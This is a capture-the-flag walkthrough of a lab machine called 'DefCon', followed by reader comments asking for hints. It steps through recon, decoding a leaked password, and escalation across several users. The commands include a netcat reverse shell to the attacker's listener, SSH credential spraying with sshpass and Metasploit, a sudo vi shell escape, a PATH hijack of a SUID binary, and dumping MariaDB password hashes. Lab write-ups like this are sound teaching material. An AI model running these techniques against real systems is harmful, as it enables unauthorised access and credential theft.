DefCon
Introduction
After a first challenge, which can be found on tryhackme.com, this is my second challenge which is dubbed “DefCon”.
The challenge will walk through some of the basic skills and will cover typical CTF-like skills.
I will post parts of the entire solution so people can go forward when stuck after some time, without spoiling everything.
[UPDATE]: next part added…..from Nicky to Smith
Recon
First finding open ports and running services:
|
1 2 3 4 5 6 7 8 9 10 |
PORT STATE SERVICE VERSION 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.25 222/tcp closed rsh-spx 443/tcp open ssl/http Apache httpd 2.4.25 ((Debian)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port22-TCP:V=7.70%I=7%D=6/10%Time=5CFE6D96%P=x86_64-pc-linux-gnu%r(Gene SF:ricLines,8,"8\[Vuu2\r\n"); MAC Address: 00:0C:29:08:EA:C8 (VMware) Service Info: Host: nsa-server |
Web-server
When directing the browser to IP 192.168.2.23 there is an error: Server not found and the URL has changed
The browser doesn’t know where to go, because there is no DNS. To solve this add an entry to the /etc/hosts file.
|
1 |
192.168.2.23 nsa-server.net |
Now the browser knows where to go.
Because the SSL certificate is self-signed there is a warning.
When accepting the risks the website is shown.
On this page there are 3 crypto puzzles.
Puzzle 1
|
1 |
dr0 cy berws sthre atapd phi shin g00ghac kergnka liikama lware erfhtim stnegar ans omwarefo drows sapeh tv iruss isiht |
Puzzle 2
|
1 |
TTSFM34YHHWGGSRSIEOR0SEMSPRA0YV4IADHDO3RSSOANUR7 |
Puzzle 3
|
1 |
turret much eagle jazzers slow fish sleep sense red perv ending spider ice atlas flood zebra kilo phone |
SSL
When checking the SSL certificate there is some information about an mail address which has another domain name.
This indicates that there is probably several virtual hosts active on the remote web-server.
To browse the other domain name, we adjust the
/etc/hosts file again.
By altering the line: 192.168.2.23 nsa-server.net nsa-secretserver.net, the browser can be directed to the other domain.
There is a terminal on the main page that informs about the status of the system.
When waiting long enough it looks like there is something wrong with the system and at the end, there is some code being exfiltrated.
|
1 |
-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.-- |
The sequence is Morse code. The forward slash is functioning as letter delimiter and the backslash as word delimiter.
The website https://gchq.github.io/CyberChef/ can help with the deciphering.
|
1 |
TE WORDPRE PAWORD OF JON I T1LLAY!!! |
There is a problem with the result. It is missing parts.
When taking another look at the source code of the page with the Morse, there is a problem with the Morse code.
It looks like there is a character encoded. To solve this problem a side step is needed.
|
1 2 3 4 |
root@redteam:~/DefCon/morse# echo "-/…./.\.--/---/.-./-../.--./.-././…/…\.--./.-/…/…/.--/---/.-./-..\---/..-.\.---/---/…./-.\../…\…/-/.----/.-../.-../…--/.-/…/-.--/-.-.--/-.-.--/-.-.--" > string.txt root@redteam:~/DefCon/morse# sed -i 's/\&\#8230\;/.../g' string.txt root@redteam:~/DefCon/morse# cat string.txt -/..../.\.--/---/.-./-../.--./.-././.../...\.--./.-/.../.../.--/---/.-./-..\---/..-.\.---/---/..../-.\../...\.../-/.----/.-../.-../...--/.-/.../-.--/-.-.--/-.-.--/-.-.-- |
After another try with the corrected string the result on cyberchef is better.
|
1 |
THE WORDPRESS PASSWORD OF JOHN IS [SPOILER] |
WordPress – Graham
The WordPress dashboard holds a menu called plugins. Here there is a plugin called WPTerm, which offers a terminal for the system.
EoP1 – Graham > John
In the /home/graham folder there is some mail.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
graham:/home/graham $ cat mbox From john@nsa-server Mon Jun 10 11:35:48 2019 Return-path: <john@nsa-server> Envelope-to: graham@nsa-server Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200 Received: from john by nsa-server with local (Exim 4.89) (envelope-from <john@nsa-server>) id 1haGiS-0004Sh-6R for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200 To: <graham@nsa-server> Subject: password problems X-Mailer: mail (GNU Mailutils 3.1.1) Message-Id: <E1haGiS-0004Sh-6R@nsa-server> From: john@nsa-server Date: Mon, 10 Jun 2019 11:35:48 +0200 Hi Graham, Sorry man to bother you, but I forgot my password. I don't want to go to Smith because he will rip me a new hole. Can you please help me? Thanks man!!! John |
In the Trash folder there is a deleted note.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
graham:/home/graham/.local/share/Trash/files $ cat note.txt Hi John, After your latest password failure I changed it. You know where it is right? Wink Wink! Pretty easy right? Try not to forget this one also. You know how the boss is like! You wanna get fired or something? Also smart idea to sent this message with netcat right? I don't trust our mailsystem. After sending this message, I'll trow it away....no one will know. hahahaha......now who is a cybernoob!!!! Best, Graham P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt? |
The new password of John is hidden inside this message in plain sight.
The last line has some uppercase letters, when separating them from the string they form the password.
|
1 2 3 4 |
root@redteam:~/DefCon/john# echo "You Do kNow whEre The paSswoRd Is hiDden rigHt?" > pass.enc root@redteam:~/DefCon/john# cat pass.enc | sed 's/[a-z]//g' | sed 's/ //g' | sed 's/\?//g' > pass.dec root@redteam:~/DefCon/john# cat pass.dec [SPOILER] |
With the username + password su-ing as john would be the next step.
|
1 2 |
graham:/home/graham/.local/share/Trash/files $ su john su: must be run from a terminal |
That is not going to work. Normally now would be a good time to SSH to this system as John.
But the SSH running on port 22 is a honeypot. So that would be a waste of time.
Instead a reverse shell to get a proper TTY shell is better.
First start a listener on your machine with netcat
|
1 2 |
root@kali:~# nc -lvnp 1337 listening on [any] 1337 ... |
Then connect from the remote machine to your machine with netcat.
|
1 |
graham:/home/graham/.local/share/Trash/files $ nc 10.10.10.128 1337 -e /bin/sh |
Now the connection is established and there is a reverse shell running.
|
1 2 3 |
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.129] 43696 id uid=1002(graham) gid=1002(graham) groups=1002(graham),8(mail) |
Now to get a proper TTY.
|
1 2 |
python -c 'import pty;pty.spawn("/bin/bash");' graham@nsa-server:/home/graham/.local/share/Trash/files$ |
After this switch to user John.
|
1 2 3 4 |
graham@nsa-server:/home/graham/.local/share/Trash/files$ su john Password: john@nsa-server:/home/graham/.local/share/Trash/files$ id uid=1003(john) gid=1003(john) groups=1003(john),8(mail) |
EoP 2 – John > George
First see what this user can do.
|
1 2 3 4 5 6 7 8 9 10 11 |
john@nsa-server:~$ sudo -l sudo -l [sudo] password for john: YDNETSRIDH Matching Defaults entries for john on nsa-server: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User john may run the following commands on nsa-server: (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh, /bin/systemctl status ssh |
It looks like user john can start a proper ssh server.
|
1 |
john@nsa-server:~$ sudo /bin/systemctl start ssh |
But port 22 was already used for the honeypot, so let´s check which port is used for the SSH server.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
john@nsa-server:~$ ss -tan ss -tan State Recv-Q Send-Q Local Address:Port Peer Address:Port LISTEN 0 80 127.0.0.1:3306 *:* LISTEN 0 128 *:80 *:* LISTEN 0 5 10.14.185.1:53 *:* LISTEN 0 128 *:22 *:* LISTEN 0 20 127.0.0.1:25 *:* LISTEN 0 128 *:443 *:* LISTEN 0 128 *:222 *:* ESTAB 0 0 192.168.20.130:443 192.168.20.131:44098 ESTAB 0 91 192.168.20.130:50678 192.168.20.131:9999 LISTEN 0 5 fe80::cc1a:73ff:fe37:ea85%lxdbr0:53 :::* LISTEN 0 2 ::1:3350 :::* LISTEN 0 20 ::1:25 :::* LISTEN 0 2 :::3389 :::* LISTEN 0 128 :::222 :::* |
Looks like port 222 is listening for a connection.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
n0w4n@lab:~/DefCon$ ssh john@nsa-server.net -p 222 The authenticity of host '[nsa-server.net]:222 ([192.168.20.130]:222)' can't be established. ECDSA key fingerprint is SHA256:sRxKXwYbv1ua3s7dbnPyX0hmggOGZ6IX3eDflEQ66Bo. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[nsa-server.net]:222,[192.168.20.130]:222' (ECDSA) to the list of known hosts. john@nsa-server.net's password: Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. No mail. Last login: Fri Apr 10 14:03:51 2020 from 10.10.10.130 john@nsa-server:~$ |
There is a file on the Documents folder.
|
1 2 3 4 5 6 |
john@nsa-server:~/Documents$ ls -lah ls -lah total 20K drwxr-x--- 2 john john 4.0K Apr 10 14:42 . drwxr-x--- 16 john john 4.0K Apr 22 10:23 .. -rw-r--r-- 1 john john 11K Apr 10 14:42 secret.png |
|
1 2 3 |
john@nsa-server:~/Documents$ file secret.png file secret.png secret.png: PDF document, version \012.\012 |
When looking at the extension, it looks like it´s picture.
But when checking the type of file, Linux says it´s a PDF.
To get a better view of the file, we transfer it to the local machine.
|
1 2 3 |
n0w4n@lab:~/DefCon$ scp -P 222 john@nsa-server.net:/home/john/Documents/secret.png . john@nsa-server.net's password: secret.png |
When we try to open the file like a picture, there is nothing to show.
Let´s copy the file and rename it to a PDF file.
Also nothing.
When looking at the file in hexeditor, the important part to check is the header.
There are several lists with the hex file headers.
When looking at the hex header for PDF we see this is similar to our file.
But the file wasn´t named .pdf
It was .png
As we can see the first 5 bytes are that of a PDF header.
But when looking a bit further, we see the 6th, 7th and 8th byte looks similar like the PNG header.
Let´s overwrite the header to match the PNG file header.
As we look to the ASCII section of hexeditor, we see this hex header is the one of PNG.
|
1 2 |
n0w4n@lab:~/DefCon$ file secret.png secret.png: PNG image data, 886 x 669, 8-bit/color RGB, non-interlaced |
The file is now readable as a picture and when opening it, there is a string.
A password maybe? But for who?
|
1 2 3 4 5 6 |
n0w4n@lab:~/DefCon$ cat names.list george graham nicky samantha smith |
To get the correct name with the found password, there are several ways to go about.
In this writeup, we´re going to try one of the following three:
First one – because it´s a small list of names, we can do it by hand or try a small bash one-liner.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do ssh -l "${i}" nsa-server.net -p 222; done george@nsa-server.net's password: Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Apr 10 14:45:30 2020 from 10.10.10.130 george@nsa-server:~$ |
Pretty simple, but with a very long list of names it becomes an annoying task to perform.
The second options is to use a tool called sshpass.
|
1 2 3 4 5 6 7 8 9 10 11 |
n0w4n@lab:~/DefCon$ for i in $(cat names.list); do sshpass -p "2W3dsF5tGh-Kl#1" ssh -o StrictHostKeyChecking=no "${i}"@nsa-server.net -p 222; done Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Apr 22 13:40:32 2020 from 192.168.20.131 george@nsa-server:~$ |
This option was quit faster and didn’t need any form of manual input for the password.
The final option is to use Metasploit:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 |
msf5 > use auxiliary/scanner/ssh/ssh_login msf5 auxiliary(scanner/ssh/ssh_login) > options Module options (auxiliary/scanner/ssh/ssh_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 22 yes The target port STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads (max one per host) USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE false yes Whether to print output for all attempts msf5 auxiliary(scanner/ssh/ssh_login) > set PASSWORD 2W3dsF5tGh-Kl#1 PASSWORD => 2W3dsF5tGh-Kl#1 msf5 auxiliary(scanner/ssh/ssh_login) > set USER_FILE names.list USER_FILE => names.list msf5 auxiliary(scanner/ssh/ssh_login) > set RHOSTS nsa-server.net RHOSTS => nsa-server.net msf5 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true VERBOSE => true msf5 auxiliary(scanner/ssh/ssh_login) > set RPORT 222 RPORT => 222 msf5 auxiliary(scanner/ssh/ssh_login) > run [+] 192.168.20.130:222 - Success: 'george:2W3dsF5tGh-Kl#1' '' [!] No active DB -- Credential data will not be saved! [*] Command shell session 1 opened (192.168.20.131:38663 -> 192.168.20.130:222) at 2020-04-22 13:53:41 +0200 [-] 192.168.20.130:222 - Failed: 'graham:2W3dsF5tGh-Kl#1' [-] 192.168.20.130:222 - Failed: 'nicky:2W3dsF5tGh-Kl#1' [-] 192.168.20.130:222 - Failed: 'samantha:2W3dsF5tGh-Kl#1' [-] 192.168.20.130:222 - Failed: 'smith:2W3dsF5tGh-Kl#1' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed |
This option also works fast when you have a very long list of usernames.
It also works very fast if you also have a list with passwords and you need to compare it.
EoP 3 – George > Samantha
The recon section starts over when logging in as a different user.
In this case user george has also some rights on this system.
|
1 2 3 4 5 6 7 |
george@nsa-server:~$ sudo -l [sudo] password for george: Matching Defaults entries for george on nsa-server: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User george may run the following commands on nsa-server: (samantha) /usr/bin/vi |
This user can run Vi editor with the rights of user Samantha.
We can abuse this, but you need to run Vi as user Samantha.
|
1 |
george@nsa-server:~$ sudo -u samantha vi test |
Inside Vi editor there is an option to run a command:
|
1 2 |
$ id uid=1006(samantha) gid=1006(samantha) groups=1006(samantha) |
Use Python again to get a proper TTY.
|
1 2 |
$ python -c 'import pty;pty.spawn("/bin/bash");' samantha@nsa-server:/home/george$ |
EoP 4 – Samantha > Nicky
Back in the home folder of this user, there is something of interest.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
samantha@nsa-server:~$ ls -lah total 72K drwxr-x--- 10 samantha samantha 4.0K Apr 10 19:49 . drwxr-xr-x 8 root root 4.0K Apr 10 14:40 .. -rw------- 1 samantha samantha 1 Apr 11 17:55 .bash_history -rw-r--r-- 1 samantha samantha 220 May 15 2017 .bash_logout -rw-r--r-- 1 samantha samantha 3.5K May 15 2017 .bashrc -rwsr-xr-x 1 root root 8.6K Apr 10 16:17 check drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Desktop drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Documents drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Downloads drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Music drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Pictures -rw-r--r-- 1 samantha samantha 675 May 15 2017 .profile drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Public drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Templates drwxr-xr-x 2 samantha samantha 4.0K May 10 2019 Videos -rw------- 1 samantha samantha 2.1K Apr 10 19:49 .viminfo |
There is an executable with the SUID flag enabled.
Let’s see what the program does.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
samantha@nsa-server:~$ ./check [-] These are all the connections at the moment: Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 *:1900 *:* udp UNCONN 0 0 10.14.185.1:53 *:* udp UNCONN 0 0 *:58430 *:* udp UNCONN 0 0 *%lxdbr0:67 *:* udp UNCONN 0 0 *:5353 *:* udp UNCONN 0 0 fe80::cc1a:73ff:fe37:ea85%lxdbr0:53 :::* udp UNCONN 0 0 :::58540 :::* udp UNCONN 0 0 :::5353 :::* tcp LISTEN 0 80 127.0.0.1:3306 *:* tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 5 10.14.185.1:53 *:* tcp LISTEN 0 128 *:22 *:* tcp LISTEN 0 20 127.0.0.1:25 *:* tcp LISTEN 0 128 *:443 *:* tcp LISTEN 0 128 *:222 *:* tcp ESTAB 0 0 192.168.20.130:222 192.168.20.131:48834 tcp LISTEN 0 5 fe80::cc1a:73ff:fe37:ea85%lxdbr0:53 :::* tcp LISTEN 0 2 ::1:3350 :::* tcp LISTEN 0 20 ::1:25 :::* tcp LISTEN 0 2 :::3389 :::* tcp LISTEN 0 128 :::222 :::* |
It runs the ss command and shows a list of the current connections.
If the program is using a relative path to execute the command we can manipulate PATH and fool the program in running something in our favor.
To do this, we first create our own version of ss.
|
1 |
samantha@nsa-server:~$ echo "/bin/bash" > /tmp/ss |
Then we make the file executable.
|
1 |
samantha@nsa-server:~$ chmod +x /tmp/ss |
Because we want the program to execute our ss file instead of the correct one, we alter the PATH variable.
|
1 |
samantha@nsa-server:~$ export PATH=/tmp:$PATH |
This way whenever the system is going to look for a program it will cycle through the PATH variable.
Normally it will start in /usr/local/bin and then go to /usr/bin and keeps on going until it finds the program.
Or not and then you get an error that the program can´t be found.
When executing the check program, the system will cycle through the PATH variable, but it will start in /tmp first.
It will find our ss executable and thinks it found the correct one and will run it.
|
1 2 3 4 5 |
samantha@nsa-server:~$ ./check [-] These are all the connections at the moment: nicky@nsa-server:~$ id uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha) |
Running the program resulted in executing our ss version and elevated our rights to….nicky (not root – bummer).
EoP 5 – Nicky > Smith
When looking at the connections earlier there was another connection that has some interest.
There is running a MariaDB instance locally.
As it seems, user nicky has access.
To log in to MariaDB, you need a password.
Lucky for you, user Nicky stores hers in a hidden file.
|
1 2 3 4 5 |
nicky@nsa-server:~/Documents$ ls -lah total 12K drwxr-xr-x 2 nicky nicky 4.0K Apr 22 14:54 . drwxr-x--- 10 nicky nicky 4.0K Apr 10 17:01 .. -rw-r--r-- 1 nicky nicky 14 Apr 22 14:54 .passwd |
|
1 2 |
nicky@nsa-server:~/Documents$ cat .passwd We_iuh#-qaSW1 |
When looking at all the network connections, it looks like there is running a mysql server with a local only connection.
|
1 2 3 4 5 6 7 8 9 10 11 |
nicky@nsa-server:/home/nicky/Documents$ mysql -u nicky -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 22 Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> |
List all databases.
|
1 2 3 4 5 6 7 8 9 10 |
MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | wordpress | +--------------------+ 4 rows in set (0.02 sec) |
Select the database to use.
|
1 2 3 4 5 |
MariaDB [wordpress]> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed |
Show all tables.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 |
MariaDB [mysql]> show tables; +---------------------------+ | Tables_in_mysql | +---------------------------+ | column_stats | | columns_priv | | db | | event | | func | | general_log | | gtid_slave_pos | | help_category | | help_keyword | | help_relation | | help_topic | | host | | index_stats | | innodb_index_stats | | innodb_table_stats | | plugin | | proc | | procs_priv | | proxies_priv | | roles_mapping | | servers | | slow_log | | table_stats | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | | user | +---------------------------+ 30 rows in set (0.00 sec) |
Select the desired columns to show.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
MariaDB [mysql]> select user,password from user; +---------+-------------------------------------------+ | user | password | +---------+-------------------------------------------+ | root | | | admin | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 | | wpadmin | *5EF818CD1907F11532AD4EB544573261C73F7F2E | | smith | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 | | nicky | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 | +---------+-------------------------------------------+ 5 rows in set (0.00 sec) MariaDB [mysql]> |
Crack it with either hashcat or just run a Google search for a site with a list of known hashes.
There is one hash that is a known one and that is the password hash of user smith.
Now to exit mysql and switching to user smith.
|
1 2 3 4 5 6 |
MariaDB [mysql]> exit; Bye nicky@nsa-server:/home/nicky/Documents$ su smith Password: smith@nsa-server:/home/nicky/Documents$ id uid=1001(smith) gid=1001(smith) groups=1001(smith),8(mail),999(lxd) |
And that’s it for this part.
Good luck…
hi bro,why did I add nsa-server.net nsa-secretserver.net resolution under hosts, or redirect to nsa-server.net.
in hosts:
192.168.123.19 nsa-server.net nsa-secretserver.net
the /etc/hosts file is used by your system to lookup hosts when connecting to them through domain name instead of IP address.
when your system wants to connect to another system by the use of a domain name and it doesn’t know the IP address, it uses the name-servers that are available in its configuration (DNS).
but before it looks for the name-servers, it will check the hosts file first.
Hi!
Any clues to escalate privileges to the “smith” user? Thank you in advance
Not really…..any clue will give away the answer.
Hi,
I’d like to get a tiny nudge / push in the right direction for user “Smith”. Spend already more than a day on this user but nothing. None of the common tools or manual enumeration helped me.
Thanks!
do you have access to user smith already or do you try to get access to user smith?
We are the same, we try to access the user “smith”.
Which users do you already have compromised and from which user do you try to jump to user smith?
All users, I’m trying to jump from “Nicky” to “Smith”.
I have done: John > George > Samantha > Nicky
I need user Smith and Root.
In this phase…..a basic recon is required.
You need to know what is happening on this machine and who has access to what.
When you figure that out, the solution is in front of you.
The only thing I found is:
Both John and Smith are member of the group ‘mail’. I read a comment between John and Graham about Smith is possibly reading their email. So maybe send some malicious email from John to Smith ?`
I already have tried something like that but untill now not managed to get that worked and I am not sure it Smith is reading his mail every one and then?!
P.s.: If this message is too much spoiler then please reply by email to me please !
You’ve got mail 🙂
Bedankt voor de email. Heb je mijn reactie daarop ook gehad (ik zag dat je een tijdelijk emailadres gebruikte) ?!
Ik vermoed dat jouw hint ging over Smith -> Root (dat zal via [SPOILER] gaan?!), maar ik moet eerst Smith zien te worden via een van de andere gebruikers (Nicky, Samantha, John of Graham) en daar zou ik graag een hint over willen 🙂
You’ve got mail 🙂
I have the same question, I’m with user “Nicky” and I’m looking for a way to pass to user “Smith”, could you give me some hint? (Do it by mail to avoid the spoiler). Thanks in advance.
With a basic recon, you will find something on the system that user Nicky has access too.
To get access you need a piece of information you probably don’t have yet, because of the way you escalated to this user.
Once you find those 2 things, the way to user smith will become clear.
Ik heb op de 20e geen email ontvangen! Kun je hem nog eens doorsturen aub?
Check mijn reply op David (21-6-2020)
got nicky, towards smith now
why is user smith that hard to escalate to?
ive been turning every stone in this machine and apparently i must have missed something…
connecting with v.. to that desktop didnt reveal anything that i havent seen from the terminal session.
im really stuck and would appreciate a small nudge to proceed
Escalating to user smith isn’t that hard (I know it’s easy for me to say), but the path to take is relatively easy when you have all the information.
Look for files, then look for a service (you really need the file or no access to this service, enumerate your findings and escalate to user smith.
I just added escalating from Samantha to Nicky and I’ll be posting getting to smith next week.
Thanks for a really nice challenge. It was hard but very cool
glad you liked it